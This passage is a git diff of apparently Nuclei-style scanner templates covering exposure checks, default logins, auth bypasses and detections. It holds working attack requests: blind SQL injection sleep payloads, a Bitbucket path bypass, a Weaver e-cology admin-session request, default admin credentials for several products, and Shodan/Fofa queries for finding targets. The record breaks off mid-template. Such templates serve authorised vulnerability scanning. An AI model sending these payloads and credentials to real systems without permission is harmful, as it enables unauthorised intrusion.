./poc/wordpress/wp-super-popup.yaml ./poc/wordpress/wp-superb-slideshow-45ba464412c6ae4b94e80349ccf8b660.yaml ./poc/wordpress/wp-superb-slideshow.yaml +./poc/wordpress/wp-superstorefinder-misconfig.yaml ./poc/wordpress/wp-support-plus-responsive-ticket-system-2914bb7bf5b0944969afa429d5685254.yaml ./poc/wordpress/wp-support-plus-responsive-ticket-system-3957ad8199faa976036a0ef47620fc07.yaml ./poc/wordpress/wp-support-plus-responsive-ticket-system-3b419b25534f982fad718594f4ceb7b3.yaml @@ -119811,6 +119989,7 @@ ./poc/xss/basic-xss-prober-698.yaml ./poc/xss/basic-xss-prober-699.yaml ./poc/xss/basic-xss-prober.yaml +./poc/xss/beyond-trust-xss.yaml ./poc/xss/bitrix-getmessage-xss.yaml ./poc/xss/bitrix-recalc-xss-galleries.yaml ./poc/xss/bitrix-xss.yaml @@ -119941,6 +120120,7 @@ ./poc/xss/java-melody-xss.yaml ./poc/xss/jenkins-audit-trail-xss.yaml ./poc/xss/jorani-benjamin-xss.yaml +./poc/xss/junos-xss.yaml ./poc/xss/kafdrop-xss-8411.yaml ./poc/xss/kafdrop-xss-8412.yaml ./poc/xss/kafdrop-xss-8413.yaml @@ -120034,6 +120214,7 @@ ./poc/xss/parentlink-xss-9467.yaml ./poc/xss/parentlink-xss.yaml ./poc/xss/photo-gallery-xss.yaml +./poc/xss/photoblocks-grid-gallery-xss.yaml ./poc/xss/php-timeclock-xss-9550.yaml ./poc/xss/php-timeclock-xss-9551.yaml ./poc/xss/php-timeclock-xss-9552.yaml @@ -120081,6 +120262,7 @@ ./poc/xss/sick-beard-xss-10234.yaml ./poc/xss/sick-beard-xss.yaml ./poc/xss/simple-xss.yaml +./poc/xss/sitecore-xml-xss.yaml ./poc/xss/siteminder-dom-based-xss.yaml ./poc/xss/siteminder-dom-xss.yaml ./poc/xss/slims-xss.yaml @@ -120221,6 +120403,7 @@ ./poc/xss/wp-plugin-marmoset-viewer-xss-11538.yaml ./poc/xss/wp-plugin-marmoset-viewer-xss.yaml ./poc/xss/wp-qwiz-online-xss.yaml +./poc/xss/wp-real-estate-xss.yaml ./poc/xss/wp-related-post-xss.yaml ./poc/xss/wp-securimage-xss-11556.yaml ./poc/xss/wp-securimage-xss-11557.yaml @@ -120257,6 +120440,7 @@ ./poc/xss/xss-fuzz.yaml ./poc/xss/xss-fuzz.yml ./poc/xss/xss-inside-tag-top-params.yaml +./poc/xss/xss-oracle.yaml ./poc/xss/xss-path.yaml ./poc/xss/xss-prober.yaml ./poc/xss/xss-rails-post.yaml diff --git a/poc/apache/apache-impala.yaml b/poc/apache/apache-impala.yaml index 0103db4544..1cd3977e36 100644 --- a/poc/apache/apache-impala.yaml +++ b/poc/apache/apache-impala.yaml @@ -4,6 +4,7 @@ info: name: Apache Impala - Exposure author: DhiyaneshDk severity: medium + description: Apache Impala is exposed. reference: - https://www.facebook.com/photo/?fbid=627585602745296&set=pcb.627585619411961 metadata: @@ -32,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009a2bb01334c3631544baac5fa27e43d8c6ef0d3840a1d8cc956d0cf32b7f15f2022022b76f87a33c3ccf12e54a3531009144fea1e30598d54a932fd1db0479d3146f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/apache/apache-zeppelin-unauth.yaml b/poc/apache/apache-zeppelin-unauth.yaml new file mode 100644 index 0000000000..674552db96 --- /dev/null +++ b/poc/apache/apache-zeppelin-unauth.yaml @@ -0,0 +1,45 @@ +id: apache-zeppelin-unauth + +info: + name: Apache Zeppelin - Unauthenticated Access + author: j4vaovo + severity: high + description: | + Apache Zeppelin server was able to be accessed because no authentication was required. + reference: | + - https://www.adminxe.com/2172.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cwe-id: CWE-285 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Zeppelin" + fofa-query: title="Zeppelin" + tags: misconfig,apache,zeppelin,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/api/security/ticket" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'status":"OK' + - '"ticket":"anonymous"' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d19c5f3d615eed414c17a664909cb53f1ba0e1a99c7f6d297a1b7fb62a168baa022100ba595777c8c3a57f62dda3cdb38e4a0b8c03bec264faff87458b48fabd7c5dc0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache-shiro.yaml b/poc/apache/default-apache-shiro.yaml new file mode 100644 index 0000000000..259a94706c --- /dev/null +++ b/poc/apache/default-apache-shiro.yaml @@ -0,0 +1,29 @@ +id: default-apache-shiro + +info: + name: Apache Shiro Default Page + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Apache Shiro Quickstart" + tags: tech,apache,shiro + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Shiro Quickstart" + + - type: status + status: + - 200 + +# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/clickhouse-unauth-api.yaml b/poc/api/clickhouse-unauth-api.yaml index 8a8675129c..98f1a624df 100644 --- a/poc/api/clickhouse-unauth-api.yaml +++ b/poc/api/clickhouse-unauth-api.yaml @@ -4,6 +4,7 @@ info: name: ClickHouse API Database Interface - Improper Authorization author: DhiyaneshDk severity: high + description: Clickhouse API Database is exposed. reference: - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1 @@ -12,7 +13,7 @@ info: max-request: 1 shodan-query: "X-ClickHouse-Summary" fofa-query: "X-ClickHouse-Summary" - tags: clickhouse,unauth,disclosure + tags: misconfig,clickhouse,unauth,disclosure http: - method: GET @@ -36,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022036599550131f2de458fc72e772f69cae1e3aa73931f856c352ff8ebc85d72ac7022004567b098e2ae9a91cc1f46ed381cb9c41b904d4393b286fbc3cf77bd930d4ae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/api/discuz-api-pathinfo.yaml b/poc/api/discuz-api-pathinfo.yaml new file mode 100644 index 0000000000..9cd016e021 --- /dev/null +++ b/poc/api/discuz-api-pathinfo.yaml @@ -0,0 +1,41 @@ +id: discuz-api-pathinfo + +info: + name: Discuz! X2.5 - Path Disclosure + author: ritikchaddha + severity: low + description: Discuz! X2.5 api.php path disclosure vulnerability + reference: + - https://crx.xmspace.net/discuz_x25_api_php.html + - http://www.1314study.com/t/87417.html + metadata: + verified: true + max-request: 1 + shodan-query: title:"Discuz!" + fofa-query: title="Discuz!" + tags: discuz,info,disclosure + +http: + - method: GET + path: + - '{{BaseURL}}/api.php?mod[]=auto' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '.php on line' + - 'function.array' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502202a08c3fa9304cacdc32c84c55e79263202268de3fd524bd2edc44d0a687648af022100b8d1d52d3b88bcf50cd5f659d3e59024543fa9e29086e2f1383aa904b46e2d68:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/graylog-api-exposure.yaml b/poc/api/graylog-api-exposure.yaml new file mode 100644 index 0000000000..62d08209c3 --- /dev/null +++ b/poc/api/graylog-api-exposure.yaml @@ -0,0 +1,91 @@ +id: graylog-api-exposure + +info: + name: Graylog REST API Endpoints - Exposure + author: Arqsz + severity: info + description: | + Graylog is a centralized log management solution. According to the official documentation, it exposes multiple endpoints (some by default). + reference: + - https://go2docs.graylog.org/5-0/setting_up_graylog/rest_api.html + - https://gist.github.com/asachs01/f1f317b2924a688deb8ed2520a4520bd + metadata: + verified: true + max-request: 50 + shodan-query: Graylog + tags: tech,graylog,api,swagger,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/api-browser" + - "{{BaseURL}}/api/cluster" + - "{{BaseURL}}/api/dashboards" + - "{{BaseURL}}/api/events/definitions" + - "{{BaseURL}}/api/events/definitions/validate" + - "{{BaseURL}}/api/events/notifications/test" + - "{{BaseURL}}/api/events/search" + - "{{BaseURL}}/api/free-enterprise/license" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/checkSubscriptions" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.enterprise.integrations/office365/startSubscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/cloudwatch/log_groups" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/inputs" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_stream" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/auto_setup/create_subscription_policy" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/health_check" + - "{{BaseURL}}/api/plugins/org.graylog.integrations/aws/kinesis/streams" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/backends" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.archive/cluster/archives/catalog/rebuild" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.collector/configurations" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.license/licenses/verify" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.report/reports" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/team-sync/test/backend" + - "{{BaseURL}}/api/plugins/org.graylog.plugins.security/teams" + - "{{BaseURL}}/api/scheduler/jobs" + - "{{BaseURL}}/api/system/authentication/services/backends" + - "{{BaseURL}}/api/system/authentication/services/test/backend/connection" + - "{{BaseURL}}/api/system/authentication/services/test/backend/login" + - "{{BaseURL}}/api/system" + - "{{BaseURL}}/api/system/content_packs" + - "{{BaseURL}}/api/system/indexer/cluster/health" + - "{{BaseURL}}/api/system/indexer/cluster/name" + - "{{BaseURL}}/api/system/debug/events/cluster" + - "{{BaseURL}}/api/system/debug/events/local" + - "{{BaseURL}}/api/system/jobs" + - "{{BaseURL}}/api/system/pipelines/pipeline" + - "{{BaseURL}}/api/system/pipelines/rule" + - "{{BaseURL}}/api/system/urlwhitelist/check" + - "{{BaseURL}}/api/system/urlwhitelist/generate_regex" + - "{{BaseURL}}/api/views" + - "{{BaseURL}}/api/views/fields" + - "{{BaseURL}}/api/views/forValue" + - "{{BaseURL}}/api/views/search/messages" + - "{{BaseURL}}/api/views/search/metadata" + - "{{BaseURL}}/api/views/search/sync" + - "{{BaseURL}}/api/users" + + host-redirects: true + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains_any(header, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'X-Graylog-Node-Id', 'Graylog', 'graylog')" + - "contains_any(body, 'swagger')" + condition: and + + - type: dsl + name: unauthorized-graylog-header + dsl: + - "status_code == 401" + - "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')" + condition: and +# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/api/seafile-api.yaml b/poc/api/seafile-api.yaml new file mode 100644 index 0000000000..6720c62a6f --- /dev/null +++ b/poc/api/seafile-api.yaml @@ -0,0 +1,49 @@ +id: seafile-api + +info: + name: Seafile API - Detect + author: righettod + severity: info + description: | + Seafile API was detected. + reference: + - https://download.seafile.com/published/web-api/home.md + - https://manual.seafile.com/ + - https://www.seafile.com/en/home/ + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"seafile" + tags: exposure,api,detect + +http: + - method: GET + path: + - '{{BaseURL}}/api2/server-info/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'seafile-basic' + - 'seafile-pro' + condition: or + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version":\s*"([0-9.]+)"' + +# digest: 4a0a00473045022100c47c1ae5d724d7b5a58f902d8807a9c455951aea612d75bae34e5f0b5fbf0d5f022004cbf64a4224a7d86c861b15ee1983a7b9a0d5ea80efc59b92ff61adb2cc285d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/bamboo-detect.yaml b/poc/atlassian/bamboo-detect.yaml new file mode 100644 index 0000000000..b4cf9aa185 --- /dev/null +++ b/poc/atlassian/bamboo-detect.yaml @@ -0,0 +1,35 @@ +id: bamboo-detect + +info: + name: Bamboo - Detection + author: bhutch + severity: info + description: | + Detect the presence of Bamboo, a CI/CD tool. + metadata: + verified: true + max-request: 1 + vendor: atlassian + shodan-query: http.favicon.hash:-1379982221 + category: devops + tags: tech,bamboo,atlassian,detect,cicd + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + matchers: + - type: dsl + dsl: + - contains(to_lower(body), "log into atlassian - atlassian bamboo") + - contains(to_lower(body), "meta name=\"application-name\" content=\"bamboo\" />") + + extractors: + - type: regex + name: version + group: 1 + regex: + - '(?i)atlassian bamboo version (.*) -' +# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/atlassian/bitbucket-auth-bypass.yaml b/poc/atlassian/bitbucket-auth-bypass.yaml new file mode 100644 index 0000000000..8f98292c01 --- /dev/null +++ b/poc/atlassian/bitbucket-auth-bypass.yaml @@ -0,0 +1,36 @@ +id: bitbucket-auth-bypass + +info: + name: Bitbucket Server > 4.8 - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + shodan-query: title:"Log in - Bitbucket" + fofa-query: title="Log in - Bitbucket" + tags: misconfig,atlassian,bitbucket,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/admin%20/db" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Database

" + - "Migrate database" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml index 6fd8c3c79a..695dccaf08 100644 --- a/poc/auth/BlindSQLAuth.yaml +++ b/poc/auth/BlindSQLAuth.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec + author: Rzizah github.com/rzizah severity: Critical description: Detects time-based blind SQL injection vulnerability http: @@ -11,12 +11,8 @@ http: payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - "if(now()=sysdate(),SLEEP(7),0)" - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" diff --git a/poc/auth/Devias-kit-register.yaml b/poc/auth/Devias-kit-register.yaml new file mode 100644 index 0000000000..ecd05a3fe3 --- /dev/null +++ b/poc/auth/Devias-kit-register.yaml @@ -0,0 +1,25 @@ +id: Devias-kit-register + +info: + name: Devias-kit-register + author: 111xnagashy + description: registeration is opened for admin dashboard for Devias Kit PRO v6.1.0 + severity: critical + tags: register ,critical ,admin ,dashboard + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/jwt/register" + - "{{BaseURL}}/auth-demo/register/classic" + - "{{BaseURL}}/auth-demo/register/modern" + redirects: false + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Terms and Conditions" + - type: status + status: + - 200 diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml index 9a5d0f2295..58cb63c201 100644 --- a/poc/auth/Mantis-Default_login.yaml +++ b/poc/auth/Mantis-Default_login.yaml @@ -6,12 +6,12 @@ info: description: A MantisBT default admin login was discovered. reference: - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - shodan-query: title:"MantisBT" tags: mantisbt,default-login requests: - raw: diff --git a/poc/auth/apache-zeppelin-unauth.yaml b/poc/auth/apache-zeppelin-unauth.yaml new file mode 100644 index 0000000000..674552db96 --- /dev/null +++ b/poc/auth/apache-zeppelin-unauth.yaml @@ -0,0 +1,45 @@ +id: apache-zeppelin-unauth + +info: + name: Apache Zeppelin - Unauthenticated Access + author: j4vaovo + severity: high + description: | + Apache Zeppelin server was able to be accessed because no authentication was required. + reference: | + - https://www.adminxe.com/2172.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cwe-id: CWE-285 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Zeppelin" + fofa-query: title="Zeppelin" + tags: misconfig,apache,zeppelin,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/api/security/ticket" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'status":"OK' + - '"ticket":"anonymous"' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d19c5f3d615eed414c17a664909cb53f1ba0e1a99c7f6d297a1b7fb62a168baa022100ba595777c8c3a57f62dda3cdb38e4a0b8c03bec264faff87458b48fabd7c5dc0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/bitbucket-auth-bypass.yaml b/poc/auth/bitbucket-auth-bypass.yaml new file mode 100644 index 0000000000..8f98292c01 --- /dev/null +++ b/poc/auth/bitbucket-auth-bypass.yaml @@ -0,0 +1,36 @@ +id: bitbucket-auth-bypass + +info: + name: Bitbucket Server > 4.8 - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + shodan-query: title:"Log in - Bitbucket" + fofa-query: title="Log in - Bitbucket" + tags: misconfig,atlassian,bitbucket,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/admin%20/db" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Database

" + - "Migrate database" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/bloofoxcms-default-login.yaml b/poc/auth/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..94317594f5 --- /dev/null +++ b/poc/auth/bloofoxcms-default-login.yaml @@ -0,0 +1,42 @@ +id: bloofoxcms-default-login + +info: + name: bloofoxCMS - Default Login + author: theamanrawat + severity: high + description: | + bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.bloofox.com/automated_setup.113.html + - https://www.bloofox.com + metadata: + verified: "true" + max-request: 1 + fofa-query: "Powered by bloofoxCMS" + tags: bloofox,cms,default-login + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - contains(body, 'bloofoxCMS Admincenter') + - status_code == 200 + condition: and + +# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/casdoor-users-password.yaml b/poc/auth/casdoor-users-password.yaml index 5fb953b17f..1359e2b5f9 100644 --- a/poc/auth/casdoor-users-password.yaml +++ b/poc/auth/casdoor-users-password.yaml @@ -4,6 +4,7 @@ info: name: Casdoor get-users Account Password Disclosure author: DhiyaneshDk severity: high + description: Casdoor get-users Account Password is exposed. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go @@ -35,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100833d91ba2032752ec44beaa26f94e9f5c828ba8ede4df27a8a5e179834a6b4ee022100d56fa523bcf08fbd1b5a7ed5c1ec9718ac1b9a52f461c5edcebda387530765fe:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/chatgpt-web-unauth.yaml b/poc/auth/chatgpt-web-unauth.yaml index e013627b64..022ec62b2a 100644 --- a/poc/auth/chatgpt-web-unauth.yaml +++ b/poc/auth/chatgpt-web-unauth.yaml @@ -4,6 +4,7 @@ info: name: ChatGPT Web - Unauthorized Access author: SleepingBag945 severity: high + description: ChatGPT Web is exposed. metadata: verified: true max-request: 1 @@ -37,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022025e67a1afa68039433f2eeb68afb01b6cefcf700d2976a83d01845f87a2cfcf902204c852c5d7b15d180a10864001521e703eddde47ab3722d0090b6bfbf62f4b3f5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/clickhouse-unauth-api.yaml b/poc/auth/clickhouse-unauth-api.yaml index 8a8675129c..98f1a624df 100644 --- a/poc/auth/clickhouse-unauth-api.yaml +++ b/poc/auth/clickhouse-unauth-api.yaml @@ -4,6 +4,7 @@ info: name: ClickHouse API Database Interface - Improper Authorization author: DhiyaneshDk severity: high + description: Clickhouse API Database is exposed. reference: - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1 @@ -12,7 +13,7 @@ info: max-request: 1 shodan-query: "X-ClickHouse-Summary" fofa-query: "X-ClickHouse-Summary" - tags: clickhouse,unauth,disclosure + tags: misconfig,clickhouse,unauth,disclosure http: - method: GET @@ -36,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022036599550131f2de458fc72e772f69cae1e3aa73931f856c352ff8ebc85d72ac7022004567b098e2ae9a91cc1f46ed381cb9c41b904d4393b286fbc3cf77bd930d4ae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/dataease-default-login.yaml b/poc/auth/dataease-default-login.yaml new file mode 100644 index 0000000000..de2c5d7694 --- /dev/null +++ b/poc/auth/dataease-default-login.yaml @@ -0,0 +1,45 @@ +id: dataease-default-login + +info: + name: Dataease - Default Login + author: DhiyaneshDK + severity: high + description: | + Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password. + As a result, many Dataease can log in with this built-in account. + reference: + - https://github.com/dataease/dataease/issues/5995 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Dataease" + tags: default-login,dataease + +http: + - method: POST + path: + - "{{BaseURL}}/api/auth/login" + + headers: + Content-Type: application/json + + body: | + { + "username": "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag==", + "password": "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw==", + "loginType": 0 + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"success":true' + - '"token":' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/ecology-verifyquicklogin-auth-bypass.yaml b/poc/auth/ecology-verifyquicklogin-auth-bypass.yaml new file mode 100755 index 0000000000..4584920761 --- /dev/null +++ b/poc/auth/ecology-verifyquicklogin-auth-bypass.yaml @@ -0,0 +1,38 @@ +id: ecology-verifyquicklogin-auth-bypass + +info: + name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass + author: SleepingBag945 + severity: high + description: | + There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package. + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html + metadata: + max-request: 1 + fofa-query: app="泛微-协同办公OA" + tags: ecology,weaver,oa,auth-bypass + +http: + - raw: + - | + POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + identifier=1&language=1&ipaddress=x.x.x.x + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"sessionkey\":" + - "\"message\":" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100cfd4d41d929b8e53906785ad3b7a060a9332012c1c1f1a29ecf69bd8372bdb3b022100de10a869048be60516db1032c67b36751b14daa03450d34da001f799731cd0e8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/elasticsearch-default-login.yaml b/poc/auth/elasticsearch-default-login.yaml new file mode 100644 index 0000000000..330f016c3d --- /dev/null +++ b/poc/auth/elasticsearch-default-login.yaml @@ -0,0 +1,53 @@ +id: elasticsearch-default-login + +info: + name: ElasticSearch - Default Login + author: Mohammad Reza Omrani | @omranisecurity + severity: high + description: | + Elasticsearch default credentials were discovered. + reference: + - 